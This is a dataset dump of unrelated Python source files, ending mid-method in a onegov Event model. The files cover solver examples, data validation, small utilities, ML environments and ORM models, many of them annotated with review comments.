text stringlengths 8 6.05M |
|---|
import mongoengine as db
from plants import Plant
def load_plants():
    """Create and persist the initial set of Plant documents.

    Each plant starts with empty friend/foe lists; relationships are
    expected to be filled in later. Requires a mongoengine connection
    to have been established before calling.
    """
    # One loop instead of five copy-pasted create/save pairs.
    for plant_id in ('basil', 'cantaloupe', 'onion', 'pepper', 'tomato'):
        Plant(_id=plant_id, plant_friends=[], plant_foes=[]).save()
if __name__ == '__main__':
    # Register the 'gardengraph' connection alias before any .save() calls.
    db.connect(alias='gardengraph', db='gardengraph', host='mongodb://localhost/gardengraph')
    load_plants()
    print("Successfully loaded and connected to db.")
##todo: swap the largest and the smallest element in a list
# li = [2, 4, 6, 3, 5, 1, 8, 10, 11, 4, 564]
# minli = li[0]
# maxli = li[0]
# for i in li:
# if i > maxli:
# maxli = i
# elif i < minli:
# minli = i
# maxin = li.index(maxli)
# minin = li.index(minli)
# li[minin] = maxli
# li[maxin] = minli
# print(li)
##todo: nesting lists
# x = [[1,2,3], [4,5,6]]
#
# a = [1,2,3]
# b = [4,5,6]
#
# x = [a, b]
#
# print(x[0][2])
##todo: Ctrl+D to duplicate a line
#copy vs deepcopy; raw strings
##todo: strings
#
# while 1:
# word = input('Podaj słowo: ')
# if "break" == word:
# break
# LIST_SAMO = ['a', 'e', 'i', 'o', 'u', 'y']
# samogloski = 0
#
# for i in LIST_SAMO:
# samogloski += word.lower().count(i)
# print(samogloski)
#
# for i in LIST_SAMO:
# x = word.lower().count(i)
# print(f'Ilość samogłosek {i}: {x}')
##todo: extract the text between < and >
# text = input('Podaj text: ')
# for i in range(len(text)):
# if text[i] == "<":
# start = i
# elif text[i] == ">":
# end = i
# print((text[start+1:end]))
|
##
# Copyright : Copyright (c) MOSEK ApS, Denmark. All rights reserved.
#
# File : solutionquality.py
#
# Purpose : To demonstrate how to examine the quality of a solution.
##
import sys
import mosek
def streamprinter(msg):
    """Forward a MOSEK solver log message to stdout, unbuffered."""
    print(msg, end="", flush=True)
# Command-line entry point: expects a problem file path as the first
# argument, solves it with MOSEK and reports custom solution-quality
# measures for the basic solution.
if len(sys.argv) <= 1:
    print("Missing argument, syntax is:")
    print(" solutionquality inputfile")
else:
    try:
        # Create the mosek environment.
        with mosek.Env() as env:
            # Create a task object linked with the environment env.
            # We create it with 0 variables and 0 constraints initially,
            # since we do not know the size of the problem.
            with env.Task(0, 0) as task:
                task.set_Stream(mosek.streamtype.log, streamprinter)

                # We assume that a problem file was given as the first command
                # line argument (received in `argv')
                task.readdata(sys.argv[1])

                # Solve the problem
                task.optimize()

                # Print a summary of the solution
                task.solutionsummary(mosek.streamtype.log)

                whichsol = mosek.soltype.bas
                solsta = task.getsolsta(whichsol)

                (pobj, pviolcon, pviolvar, pviolbarvar, pviolcones,
                 pviolitg, dobj, dviolcon, dviolvar, dviolbarvar,
                 dviolcones) = task.getsolutioninfo(whichsol)

                if solsta in [mosek.solsta.optimal, mosek.solsta.near_optimal]:
                    abs_obj_gap = abs(dobj - pobj)
                    rel_obj_gap = abs_obj_gap / (1.0 + min(abs(pobj), abs(dobj)))

                    # Worst primal violation over constraints, variables,
                    # semidefinite variables and cones.
                    max_primal_viol = max(pviolcon, pviolvar)
                    max_primal_viol = max(max_primal_viol, pviolbarvar)
                    max_primal_viol = max(max_primal_viol, pviolcones)

                    # Worst dual violation over the same categories.
                    max_dual_viol = max(dviolcon, dviolvar)
                    max_dual_viol = max(max_dual_viol, dviolbarvar)
                    max_dual_viol = max(max_dual_viol, dviolcones)

                    # Assume the application needs the solution to be within
                    # 1e-6 of optimality in an absolute sense. Another approach
                    # would be looking at the relative objective gap
                    print("\n\n")
                    print("Customized solution information.\n")
                    print(" Absolute objective gap: %e\n" % abs_obj_gap)
                    print(" Relative objective gap: %e\n" % rel_obj_gap)
                    print(" Max primal violation : %e\n" % max_primal_viol)
                    print(" Max dual violation : %e\n" % max_dual_viol)

                    accepted = True

                    if rel_obj_gap > 1e-6:
                        print("Warning: The relative objective gap is LARGE.")
                        accepted = False

                    # We will accept a primal infeasibility of 1e-8 and
                    # dual infeasibility of 1e-6. These numbers should be
                    # chosen problem dependent.
                    if max_primal_viol > 1e-8:
                        print("Warning: Primal violation is too LARGE")
                        accepted = False

                    if max_dual_viol > 1e-6:
                        print("Warning: Dual violation is too LARGE.")
                        accepted = False

                    if accepted:
                        numvar = task.getnumvar()
                        print("Optimal primal solution")
                        xj = [0.]
                        for j in range(numvar):
                            task.getxxslice(whichsol, j, j + 1, xj)
                            print("x[%d]: %e\n" % (j, xj[0]))
                    else:
                        # Print detailed information about the solution
                        task.analyzesolution(mosek.streamtype.log, whichsol)
                elif solsta in [mosek.solsta.dual_infeas_cer,
                                mosek.solsta.prim_infeas_cer,
                                mosek.solsta.near_dual_infeas_cer,
                                mosek.solsta.near_prim_infeas_cer]:
                    print("Primal or dual infeasibility certificate found.")
                elif solsta == mosek.solsta.unknown:
                    # Bug fix: was `mosek.solsta.unkwown`, which raised an
                    # AttributeError whenever this branch was reached.
                    print("The status of the solution is unknown.")
                else:
                    print("Other solution status")
    except mosek.Error as e:
        print(e)
|
from twitter.checkstyle.common import Nit, PythonFile
from twitter.checkstyle.plugins.new_style_classes import NewStyleClasses
def test_new_style_classes():
    """Checkstyle plugin test: old-style classes are flagged as T606 errors."""
    # An old-style class next to a new-style one: exactly one nit, reported
    # on the line of the offending class, with code T606 and ERROR severity.
    nsc = NewStyleClasses(PythonFile.from_statement("""
class OldStyle:
  pass
class NewStyle(object):
  pass
"""))
    nits = list(nsc.nits())
    assert len(nits) == 1
    assert nits[0]._line_number == 1
    assert nits[0].code == 'T606'
    assert nits[0].severity == Nit.ERROR

    # Any explicit base classes count as new-style: no nits.
    nsc = NewStyleClasses(PythonFile.from_statement("""
class NewStyle(OtherThing, ThatThing, WhatAmIDoing):
  pass
"""))
    nits = list(nsc.nits())
    assert len(nits) == 0

    # Empty parentheses still leave the MRO unspecified: flagged as well.
    nsc = NewStyleClasses(PythonFile.from_statement("""
class OldStyle(): # unspecified mro
  pass
"""))
    nits = list(nsc.nits())
    assert len(nits) == 1
    assert nits[0].code == 'T606'
|
import io
import numpy as np
import sys
from gym.envs.toy_text import discrete
import mdptoolbox.example
# Action identifiers for the forest-management MDP.
WAIT = 0  # let the forest grow for another year
CUT = 1   # cut the forest now and collect the wood
class ForestEnv(discrete.DiscreteEnv):
    """
    Generate a MDP example based on a simple forest management scenario
    Reference: https://pymdptoolbox.readthedocs.io/en/latest/api/example.html#mdptoolbox.example.forest
    """
    metadata = {'render.modes': ['human', 'ansi']}

    def __init__(self, num_states=3):
        # Only the reward matrix from pymdptoolbox is used here; the
        # transition model is rebuilt by hand below.
        _, R = mdptoolbox.example.forest(S=num_states)
        p = 0.1  # The probability that a fire burns the forest
        nS = num_states
        nA = 2
        P = {}
        for s in range(nS):
            # P[s][a] = (prob, next_state, reward, is_done)
            P[s] = {a: [] for a in range(nA)}
            reward_on_wait = R[s, WAIT]
            reward_on_cut = R[s, CUT]
            # WAIT: with probability p a fire resets the forest to state 0;
            # otherwise it grows one state, capped at nS - 1.
            # NOTE(review): the 4th tuple element ("is_done") is None here;
            # gym's DiscreteEnv conventionally expects a boolean -- confirm
            # downstream handling.
            P[s][WAIT] = [(p, 0, reward_on_wait, None), (1.0 - p, min(s + 1, nS - 1), reward_on_wait, None)]
            # CUT: always returns the forest to state 0.
            P[s][CUT] = [(1.0, 0, reward_on_cut, None)]
        # Initial state distribution is uniform
        isd = np.ones(nS) / nS
        # We expose the model of the environment for educational purposes
        # This should not be used in any model-free learning algorithm
        self.P = P
        super(ForestEnv, self).__init__(nS, nA, P, isd)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
import sys
import zipfile
import projectConfig
global azip
# Initialise the module-global zip handle used by AddFile()/ZipEnd().
def ZipInit(targetzip):
    global azip
    # Open `targetzip` for writing with DEFLATE compression.
    azip = zipfile.ZipFile(targetzip, 'w', zipfile.ZIP_DEFLATED)
# Add a single file or an entire directory tree to the open archive.
def AddFile(srcfile):
    global azip
    if os.path.isfile(srcfile):  # a plain file
        azip.write(srcfile)
    if os.path.isdir(srcfile):  # a directory
        azip.write(srcfile)  # store the directory entry itself
        for dirpath, dirnames, filenames in os.walk(srcfile):  # every file below it
            for filename in filenames:
                # print "file-",file
                # print
                azip.write(os.path.join(dirpath, filename))
# Finish writing: close the module-global archive opened by ZipInit().
def ZipEnd():
    global azip
    # NOTE(review): if ZipInit() was never called, `azip` is unbound and this
    # raises NameError instead of printing the message below -- confirm.
    if azip:
        azip.close()
    else:
        print "zip not init---please init first"
# Unpack an archive.
def ZipExtral(targetzip, destpath):
    """Extract every member of `targetzip` into `destpath`, then close it.

    Rebinds the module-global `azip` handle, like the other helpers here.
    """
    global azip
    azip = zipfile.ZipFile(targetzip)
    # extractall() walks namelist() internally -- same effect as the
    # member-by-member loop, in one call.
    azip.extractall(destpath)
    azip.close()
#7 zip-------------------------------------------------
# Compress the folder `zipFolder` into the archive `saveZipName` using the
# external 7-zip binary. To archive only a directory's contents (without the
# root directory entry), pass the folder as ".\\dir\\*".
def zipFolder(saveZipName, zipFolder, pwd=None):
    # NOTE(review): the command line is built by string concatenation and run
    # via os.system -- paths with spaces or shell metacharacters will break
    # or be interpreted by the shell. Flagging rather than changing.
    cmd = projectConfig.Zip_Exe + " a " + saveZipName + " " + zipFolder + " -mx=9 -mm=LZMA"
    if pwd:
        cmd = cmd + " -p" + pwd
    print cmd
    os.system(cmd)
# Extract `zippath` into `savefoler` using the external 7-zip binary,
# creating the destination directory if needed.
def extralFolder(zippath, savefoler, pwd=None):
    # savefoler = os.path.join( os.getcwd(),savefoler)
    if not os.path.exists(savefoler):
        os.makedirs(savefoler)
    # NOTE(review): 7-zip expects its output switch without a space
    # ("-oDIR"); "-o DIR" as built here may not be parsed as intended --
    # confirm against the 7-zip command line documentation.
    cmd = projectConfig.Zip_Exe + " x -o " + savefoler + " " + zippath
    if pwd:
        cmd = cmd + " -p" + pwd
    print cmd
    os.system(cmd)
#7 zip-------------------------------------------------
# ZipInit("tes1t.zip")
# AddFile("folder1")
# AddFile("folder2")
# ZipEnd()
|
import numpy as np
import cv2
import utils
import os
import argparse
from util_classes import Model, Template, Store
from utils import *
from cv2 import *
from matplotlib.patches import Circle, Wedge, Polygon
from matplotlib.collections import PatchCollection
from matplotlib.animation import FFMpegWriter
import time
def parse_args():
    """Parse command-line arguments for the post-processing script.

    Returns the validated namespace, or None if validation fails.
    """
    desc = "Python implementation of the post processing for pose estimation"
    parser = argparse.ArgumentParser(description=desc)

    def str2bool(value):
        # Bug fix: `type=bool` is an argparse trap -- bool("False") is True,
        # so `--v False` enabled verbose mode. Parse the usual spellings.
        return str(value).lower() in ('true', '1', 'yes', 'y')

    parser.add_argument('--images_name', type=str, default='', help='the name generic of the images')
    parser.add_argument('--nb_image', type=int, default=0, help='the number of images you have')
    parser.add_argument('--v', type=str2bool, default=False, help='verbose mode')
    return check_args(parser.parse_args())
def check_args(args):
    """Validate parsed arguments.

    Returns the namespace unchanged when `images_name` points to an existing
    path; prints a message and returns None otherwise.
    """
    # The old version used `assert` (stripped under -O) inside a bare
    # except; an explicit check keeps the behaviour and is robust.
    if not os.path.exists(args.images_name):
        print('image not found')
        return None
    return args
def main():
    """Run pose-estimation post-processing over a numbered image sequence.

    NOTE(review): `plt` and `mesh_kpts` are not imported by name in this
    file -- presumably they come in via the star imports above; confirm.
    """
    args = parse_args()
    if args is None:
        exit()
    fig = plt.figure('Figure')
    for i in range(args.nb_image+1):
        # Rebuild the i-th file name: keep the prefix, substitute a
        # zero-padded 6-digit frame number, keep the 4-char extension.
        im_name = args.images_name
        im_name = im_name[0:len(im_name)-10] + '{:06d}'.format(i) + im_name[len(im_name)-4:len(im_name)]
        [img_crop, mapIm, _, mesh2d_fp, _, _] = mesh_kpts(im_name, verbosity=args.v)
        # The visualisation pipeline below is intentionally disabled.
        #img_with_keypoints = 0.5 * mapIm + img_crop * 0.5
        #
        ## configuration of the figure
        #
        #ax1 = fig.add_subplot(141)
        #ax1.axes.get_xaxis().set_visible(False)
        #ax1.axes.get_yaxis().set_visible(False)
        #ax1.imshow(img_crop)
        #
        #ax2 = fig.add_subplot(142)
        #ax2.axes.get_xaxis().set_visible(False)
        #ax2.axes.get_yaxis().set_visible(False)
        #ax2.imshow(img_with_keypoints)
        #
        #ax7 = fig.add_subplot(143)
        #ax7.axes.get_xaxis().set_visible(False)
        #ax7.axes.get_yaxis().set_visible(False)
        #ax7.imshow(img_crop)
        #polygon = Polygon(mesh2d_fp, linewidth=1, edgecolor='g', facecolor='none')
        #ax7.add_patch(polygon)
        #
        #ax8 = fig.add_subplot(144)
        #ax8.axes.get_xaxis().set_visible(False)
        #ax8.axes.get_yaxis().set_visible(False)
        #ax8.imshow(img_with_keypoints)
        #polygon = Polygon(mesh2d_fp, linewidth=1, edgecolor='g', facecolor='none')
        #ax8.add_patch(polygon)
        #
        #print('frame number : ',i)
        #fig.subplots_adjust(wspace=0)
        #fig.savefig('./video_demo/frame_'+im_name[-10:len(im_name)])
        #fig.clear()
    # Disabled video-assembly pass over the saved frames.
    #fps = 30
    #fourcc = cv2.VideoWriter_fourcc('X','V','I','D')
    #v = cv2.VideoWriter('./video_demo.avi',fourcc,30.0,(540,180))
    #
    #
    #for i in range(args.nb_image +1):
    #
    #    im_name = args.images_name
    #    im_name = im_name[0:len(im_name) - 10] + '{:06d}'.format(i) + im_name[len(im_name) - 4:len(im_name)]
    #    im_name = './video_demo/frame_' + im_name[-10:len(im_name)]
    #
    #    im = cv2.imread(im_name)
    #
    #    crop_img = im[150:150+180, 60:640-40]
    #
    #    v.write(crop_img)
    #    print('frame number : ',i)
    #cv2.destroyAllWindows()
    #v.release()
    return 0
if __name__ == '__main__':
    # Wall-clock the whole run and print the elapsed seconds at the end.
    debut = time.time()
    main()
    fin = time.time()
    print((fin-debut))
# coding: utf-8
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
from made_bitree import TreeNode
class Solution:
    def minDepth(self, root):
        """Return the depth of the shallowest leaf (0 for an empty tree).

        Level-order traversal: the first leaf encountered is, by
        construction, at the minimum depth.

        :param root: a tree node (or None)
        :return: an integer
        """
        if not root:
            return 0
        depth = 1
        frontier = [root]
        while frontier:
            next_frontier = []
            for node in frontier:
                # A node with no children is a leaf: done.
                if node.left is None and node.right is None:
                    return depth
                if node.left is not None:
                    next_frontier.append(node.left)
                if node.right is not None:
                    next_frontier.append(node.right)
            frontier = next_frontier
            depth += 1
# root = TreeNode("{3,9,20,#,#,15,7}")
# Demo (Python 2): build a tree from its serialised form and print the
# minimum depth.
root = TreeNode("{1,2}")
a = Solution()
print a.minDepth(root)
import re
import numpy as np
from collections import Counter
class TokenPreprocessor:
    """
    A util-class for preprocessing tokens created by the morphological_analyzer.
    It has the ability to modify words, e.g. removal of stopwords.

    The list of tokens which are supposed to be preprocessed are to be specified
    as the argument of the constructor.
    After calling methods for preprocess, the result can be accessed by the attribute "result".
    """

    def __init__(self, tokenized_list):
        """
        Constructor

        Parameters
        ----------
        tokenized_list : list of list of tokens
            The list of tokens to be preprocessed.
            The parameter can be obtained by the morphological_analyser.analyze() method.
        """
        self.result = tokenized_list

    def get_words(self):
        """
        Get words by string as the result of preprocesses.

        Returns
        -------
        word_list : list of list of str
            The list of words created from preprocessed tokens.
        """
        word_list = [[token.surface for token in sentence] for sentence in self.result]
        return word_list

    def remove_blanks(self):
        """
        Remove blank words in given tokens.
        """
        self.result = [[token for token in sentence if token.surface] for sentence in self.result]

    def remove_stopword(self, stopwords):
        """
        Remove stopwords in given tokens.

        Parameters
        ----------
        stopwords : list of str
            The list of words to be removed from tokens. (stopwords)
        """
        for stopword in stopwords:
            self.result = [[token for token in sentence if stopword != token.surface]
                           for sentence in self.result]

    def remove_by_regexes(self, regexes):
        """
        Remove words matching given regular expressions.

        Parameters
        ----------
        regexes : list of str
            The list of regexes to be used for the removal.
        """
        for regex in regexes:
            self.result = [[token for token in sentence if re.match(regex, token.surface) is None]
                           for sentence in self.result]

    def remove_frequent_words(self, threshold=100):
        """
        Remove frequent words in given tokens.
        The words which have top-(threshold) occurrence will be removed.

        Parameters
        ----------
        threshold : int
            The threshold for removal.
        """
        words_list = []
        for sentence in self.result:
            words = []
            for token in sentence:
                words.append(token.surface)
            words_list.append(words)
        # Get frequent words and remove them
        frequent_words = self.__get_frequent_words(words_list, threshold)
        self.result = [[token for token in sentence if token.surface not in frequent_words]
                       for sentence in self.result]

    def __get_frequent_words(self, words_list, threshold):
        # Count every word and return the `threshold` most common as a set.
        fdist = Counter()
        for words in words_list:
            for word in words:
                fdist[word] += 1
        common_words = {word for word, freq in fdist.most_common(threshold)}
        return common_words

    def filter_by_part_of_speeches(self, part_of_speeches):
        """
        Filter tokens by given part of speeches.
        The tokens whose part of speech matches one of "part_of_speeches" will be extracted.

        Parameters
        ----------
        part_of_speeches : list of str
            The list of part of speeches to be used for filtering tokens.
        """
        # Bug fix: the previous version iterated over the undefined name
        # `part_of_speech_list`, raising NameError whenever it was called.
        self.result = [[token for token in sentence
                        if any(x in token.part_of_speech for x in part_of_speeches)]
                       for sentence in self.result]
|
import os
import re
def transform_data(input_data_file):
    """Parse a passport batch file into a list of dicts.

    Records are separated by blank lines; each record is a set of
    whitespace-separated "key:value" fields.
    """
    with open(input_data_file) as handle:
        raw = handle.read()
    passports = []
    for chunk in raw.split("\n\n"):
        record = dict(field.split(":") for field in chunk.split())
        passports.append(record)
    return passports
def check_data(passports_as_list):
    """Count passports that carry all required fields AND pass every
    per-field validation (cid is deliberately not required)."""
    required = ("byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid")
    valid_passports = 0
    for passport in passports_as_list:
        # Skip records missing any mandatory field.
        if any(field not in passport for field in required):
            continue
        # Short-circuits in the same order as before, so the diagnostic
        # prints from the helpers appear identically.
        is_valid = (
            check_hair(passport["hcl"])
            and check_eye(passport["ecl"])
            and check_pid(passport["pid"])
            and check_height(passport["hgt"])
            and check_between(1920, 2002, passport["byr"])
            and check_between(2010, 2020, passport["iyr"])
            and check_between(2020, 2030, passport["eyr"])
        )
        if is_valid:
            valid_passports += 1
    return valid_passports
def check_between(a, b, check_value):
    """Return True iff int(check_value) lies in the inclusive range [a, b];
    print a diagnostic otherwise."""
    ok = a <= int(check_value) <= b
    if not ok:
        print("Invalid", check_value)
    return ok
def check_height(hgt):
    """Validate a height field: "<n>cm" with n in 150-193, or "<n>in" with
    n in 59-76. Prints a diagnostic and returns False otherwise.
    """
    try:
        # .groups() on a failed match (None) raises AttributeError;
        # a non-string argument raises TypeError from re.match.
        # (Previously a bare `except:` swallowed everything, including
        # KeyboardInterrupt.)
        number, unit = re.match(r"([0-9]+)([a-z]+)", hgt).groups()
    except (AttributeError, TypeError):
        print("Invalid Height", hgt)
        return False
    if unit == "in" and 59 <= int(number) <= 76:
        return True
    if unit == "cm" and 150 <= int(number) <= 193:
        return True
    print("Invalid Height", hgt)
    return False
def check_hair(hcl):
    """Validate hair colour: '#' followed by exactly six lowercase hex digits.

    Bug fix: the old pattern had no end anchor, so trailing garbage after
    six valid digits (e.g. "#123abc7x") was accepted.
    """
    if re.fullmatch(r"#[0-9a-f]{6}", hcl):
        return True
    print("Invalid Hair", hcl)
    return False
def check_eye(ecl):
    """Return True iff `ecl` is one of the seven allowed eye colours;
    print a diagnostic otherwise."""
    if ecl in {"amb", "blu", "brn", "gry", "grn", "hzl", "oth"}:
        return True
    print("Invalid EYE", ecl)
    return False
def check_pid(pid):
    """Return True iff `pid` is exactly nine decimal digits;
    print a diagnostic otherwise."""
    if not re.search(r"^([0-9]{9}$)", pid):
        print("Invalid PID", pid)
        return False
    return True
if __name__ == '__main__':
    # Read input.txt next to this script, parse it into passport dicts and
    # report how many are fully valid.
    current_dir = os.path.dirname(os.path.abspath(__file__))
    input_file = os.path.join(current_dir, 'input.txt')
    passports_as_list = transform_data(input_file)
    print("Valid Passports", check_data(passports_as_list))
|
import u12
import numpy
# Read a 4-bit BCD exponent from digital pins and an analog mantissa from a
# LabJack U12, then report the chamber pressure as mantissa * 10^-exponent.
d = u12.U12()
digital_readout = []
pins = [0, 1, 2, 4]
for x in pins:
    # serial = 100039255
    digital_readout.append(d.eDigitalIn(x, readD=1))
bcd = []
for x in digital_readout:
    bcd.append(x["state"])
# Assemble the exponent from the bits; weights are 1,2,8,4 (not 1,2,4,8).
# NOTE(review): confirm the 8/4 weight swap matches the actual wiring.
int_exp = bcd[0]*1 + bcd[1]*2 + bcd[2]*8 + bcd[3]*4
analog_mantissa = d.eAnalogIn(0)
flt_mantissa = analog_mantissa["voltage"]
#d.localID(2)
# print(d.eAnalogIn(0, 100035035))
# k=d.digitalIO()
# print(d.eDigitalIn(0))
# print(digital_readout)
print "Mantissa: " + str(flt_mantissa)
print "Exponent: " + str(int_exp)
print "Chamber Pressure Reading: " + str(flt_mantissa) + " * 10^ -" + str(int_exp)
pressure = flt_mantissa * pow(10, -1*int_exp)
print pressure
|
"""This package contains the base class :class:`Source` for :class:`TwoPoint`
sources and implementations.
"""
# flake8: noqa
|
import os
from urllib.request import Request, urlopen
from ccdc.cavity import Cavity
import tempfile
def ftp_download(pdb_code, out_dir="pdb"):
    """Download a PDB entry from RCSB and write it to `out_dir`.

    (The name is historical: the download actually uses HTTPS, not FTP.)

    :param pdb_code: four-character PDB identifier, e.g. "4P7X"
    :param out_dir: existing directory to write "<pdb_code>.pdb" into
    """
    url = f"https://files.rcsb.org/download/{pdb_code}.pdb"
    # Close the HTTP response deterministically (it leaked before).
    with urlopen(Request(url)) as response:
        text = response.read().decode("utf-8")
    # write out decoded file
    with open(os.path.join(out_dir, f"{pdb_code}.pdb"), "w") as w:
        w.write(text)
def main():
    """Smoke-test the CSD environment; the cavity-download pipeline is kept
    below, commented out."""
    print(os.environ["CSDHOME"])
    # from ccdc import io
    # print(io.EntryReader('CSD'))
    # pdb = "4P7X"
    # tmp = tempfile.mkdtemp()
    # ftp_download(pdb, out_dir=tmp)
    #
    # fpath = os.path.join(tmp, f"{pdb}.pdb")
    # cavities = Cavity.from_pdb_file(fpath)
    # cav = cavities[0]
    #
    # for feature in cav.features:
    #     print(feature)
    #     print(feature.residue)

if __name__ == "__main__":
    main()
import warnings
from datetime import datetime
from dateutil import rrule
from dateutil.rrule import rrulestr
from icalendar import Calendar as vCalendar
from icalendar import Event as vEvent
from icalendar import vRecur
from onegov.core.orm import Base
from onegov.core.orm.abstract import associated
from onegov.core.orm.mixins import content_property
from onegov.core.orm.mixins import ContentMixin
from onegov.core.orm.mixins import meta_property
from onegov.core.orm.mixins import TimestampMixin
from onegov.core.orm.types import UUID
from onegov.event.models.mixins import OccurrenceMixin
from onegov.event.models.occurrence import Occurrence
from onegov.file import File
from onegov.file.utils import as_fileintent
from onegov.gis import CoordinatesMixin
from onegov.search import SearchableContent
from PIL.Image import DecompressionBombError
from pytz import UTC
from sedate import standardize_date
from sedate import to_timezone
from sqlalchemy import and_
from sqlalchemy import Column
from sqlalchemy import desc
from sqlalchemy import Enum
from sqlalchemy import func
from sqlalchemy import Text
from sqlalchemy.orm import backref
from sqlalchemy.orm import object_session
from sqlalchemy.orm import relationship
from sqlalchemy.orm import validates
from uuid import uuid4
class EventFile(File):
    """ A file (image or PDF) attached to an event. """
    __mapper_args__ = {'polymorphic_identity': 'eventfile'}
class Event(Base, OccurrenceMixin, ContentMixin, TimestampMixin,
            SearchableContent, CoordinatesMixin):
    """ Defines an event.

    Occurrences are stored in a separate table containing only a minimal set
    of attributes from the event. This could also be achieved using postgres
    directly with dateutil/plpythonu/pg_rrule and materialized views.

    Occurrences are only created/updated, if the event is published.
    Occurrences are created only for this and the next year.

    """

    __tablename__ = 'events'

    #: Number of future years (current year + N) for which occurrence dates
    #: are generated; see :meth:`occurrence_dates`.
    occurrence_dates_year_limit = 2

    #: Internal number of the event
    id = Column(UUID, primary_key=True, default=uuid4)

    #: State of the event
    state = Column(
        Enum('initiated', 'submitted', 'published', 'withdrawn',
             name='event_state'),
        nullable=False,
        default='initiated'
    )

    #: description of the event
    description = content_property()

    #: the event organizer
    organizer = content_property()

    #: the event organizer's public e-mail address
    organizer_email = content_property()

    #: the event organizer's phone number
    organizer_phone = content_property()

    #: an external url for the event
    external_event_url = content_property()

    #: the price of the event (a text field, not an amount)
    price = content_property()

    #: the source of the event, if imported
    source = meta_property()

    #: when the source of the event was last updated (if imported)
    source_updated = meta_property()

    #: Recurrence of the event (RRULE, see RFC2445)
    recurrence = Column(Text, nullable=True)

    #: The access property of the event, taken from onegov.org. Not ideal to
    #: have this defined here, instead of using an AccessExtension, but that
    #: would only be possible with deeper changes to the Event model.
    access = meta_property(default='public')

    #: The associated image
    image = associated(
        EventFile, 'image', 'one-to-one', uselist=False, backref_suffix='image'
    )

    #: The associated PDF
    pdf = associated(
        EventFile, 'pdf', 'one-to-one', uselist=False, backref_suffix='pdf'
    )
    def set_image(self, content, filename=None):
        """ Set (or clear) the event's image; see :meth:`set_blob`. """
        self.set_blob('image', content, filename)

    def set_pdf(self, content, filename=None):
        """ Set (or clear) the event's PDF; see :meth:`set_blob`. """
        self.set_blob('pdf', content, filename)

    def set_blob(self, blob, content, filename=None):
        """ Adds or removes the given blob.

        Falsy ``content`` removes the blob; otherwise the existing file
        reference is replaced, or a new :class:`EventFile` is created.
        """
        filename = filename or 'file'
        if not content:
            setattr(self, blob, None)
        elif getattr(self, blob):
            getattr(self, blob).reference = as_fileintent(content, filename)
        else:
            try:
                setattr(self, blob, EventFile(
                    name=filename,
                    reference=as_fileintent(content, filename)
                ))
            except DecompressionBombError:
                # Oversized (possibly malicious) images are silently dropped.
                setattr(self, blob, None)
    #: Occurrences of the event
    occurrences: 'relationship[list[Occurrence]]' = relationship(
        "Occurrence",
        cascade="all, delete-orphan",
        backref=backref("event"),
        lazy='joined',
    )

    # Fields indexed for full-text search (see onegov.search).
    es_properties = {
        'title': {'type': 'localized'},
        'description': {'type': 'localized'},
        'location': {'type': 'localized'},
        'organizer': {'type': 'localized'}
    }

    @property
    def es_public(self):
        # Only published events are publicly searchable.
        return self.state == 'published'

    @property
    def es_skip(self):
        # Skip indexing for unpublished events, or when explicitly flagged
        # via the private `_es_skip` attribute.
        return self.state != 'published' or getattr(self, '_es_skip', False)
    def source_url(self, request):
        """ Returns an url pointing to the external event if imported.

        Only guidle sources are currently mapped to an URL; any other
        (or missing) source yields ``None``.
        """
        if not self.source:
            return None

        if self.source.startswith('guidle'):
            guidle_id = self.source.split('-')[-1].split('.')[0]
            return f"https://www.guidle.com/angebote/{guidle_id}"

    def __setattr__(self, name, value):
        """ Automatically update the occurrences if shared attributes change.

        """
        super().__setattr__(name, value)
        # These attributes are copied onto each Occurrence row, so the
        # stored occurrences must be regenerated whenever one changes.
        if name in ('state', 'title', 'name', 'location', 'tags',
                    'start', 'end', 'timezone', 'recurrence'):
            self._update_occurrences()
    @property
    def base_query(self):
        # All stored occurrences belonging to this event.
        session = object_session(self)
        return session.query(Occurrence).filter_by(event_id=self.id)

    @property
    def latest_occurrence(self):
        """ Returns the occurrence which is presently occurring, the next
        one to occur or the last occurrence.

        """
        base = self.base_query

        # currently running occurrence, if any
        current = base.filter(and_(
            Occurrence.start <= func.now(),
            Occurrence.end >= func.now()
        )).order_by(Occurrence.start).limit(1)

        # next occurrence to start
        future = base.filter(
            Occurrence.start >= func.now()
        ).order_by(Occurrence.start).limit(1)

        # most recent past occurrence, as a fallback
        past = base.filter(
            Occurrence.end <= func.now()
        ).order_by(desc(Occurrence.start))

        return current.union_all(future, past).first()

    def future_occurrences(self, offset=0, limit=10):
        """ Returns a query of upcoming occurrences, ordered by start. """
        return self.base_query.filter(
            Occurrence.start >= func.now()
        ).order_by(Occurrence.start).offset(offset).limit(limit)
    @validates('recurrence')
    def validate_recurrence(self, key, r):
        """ Our rrules are quite limited in their complexity. This validator
        makes sure that is actually the case.

        This is a somewhat harsh limit, but it mirrors the actual use of
        onegov.event at this point. More complex rrules are not handled by the
        UI, nor is there currently a plan to do so.

        Currently supported are weekly recurrences and lists of rdates.
        The rationale is that people commonly add recurring events on a weekly
        basis (which is a lot of work for a whole year). Or on a monthly
        or yearly basis, in which case selection of single dates is
        acceptable, or even preferable to complex rrules.

        This UI talk doesn't belong into a module of course, but it is again
        a reality that only a strict subset of rules is handled and so we want
        to catch events which we cannot edit in our UI early if they are
        imported from outside.

        """
        if r:
            rule = rrulestr(r)

            # a rule must either have a frequency or be a list of rdates
            if not hasattr(rule, '_freq'):
                if all((l.startswith('RDATE') for l in r.splitlines())):
                    return r
                raise RuntimeError(f"'{r}' is too complex")

            # we also only do weekly recurrences (they can also be used
            # to do daily recurrences if they are set to include all days)
            if not rule._freq == rrule.WEEKLY:
                raise RuntimeError(f"The frequency of '{r}' is not WEEKLY")

            # we require a definite end
            if not hasattr(rule, '_until'):
                raise RuntimeError(f"'{r}' has no UNTIL")

            # we also want the end date to be timezone-aware
            if rule._until.tzinfo is None:
                raise RuntimeError(f"'{r}''s UNTIL is not timezone-aware")

        return r
    def occurrence_dates(self, limit=True, localize=False):
        """ Returns the start dates of all occurrences.

        Returns non-localized dates per default. Limits the occurrences per
        default to this and the next year.

        """

        def to_local(dt, timezone):
            # Strip to a naive local datetime so dateutil's rrule handles
            # DST transitions correctly.
            if dt.tzinfo:
                return to_timezone(dt, timezone).replace(tzinfo=None)
            return dt

        dates = [self.start]
        if self.recurrence:
            # Make sure the RRULE uses local dates (or else the DST is wrong)
            start_local = to_local(self.start, self.timezone)
            try:
                rule = rrulestr(self.recurrence, dtstart=self.start)
                if getattr(rule, '_dtstart', None):
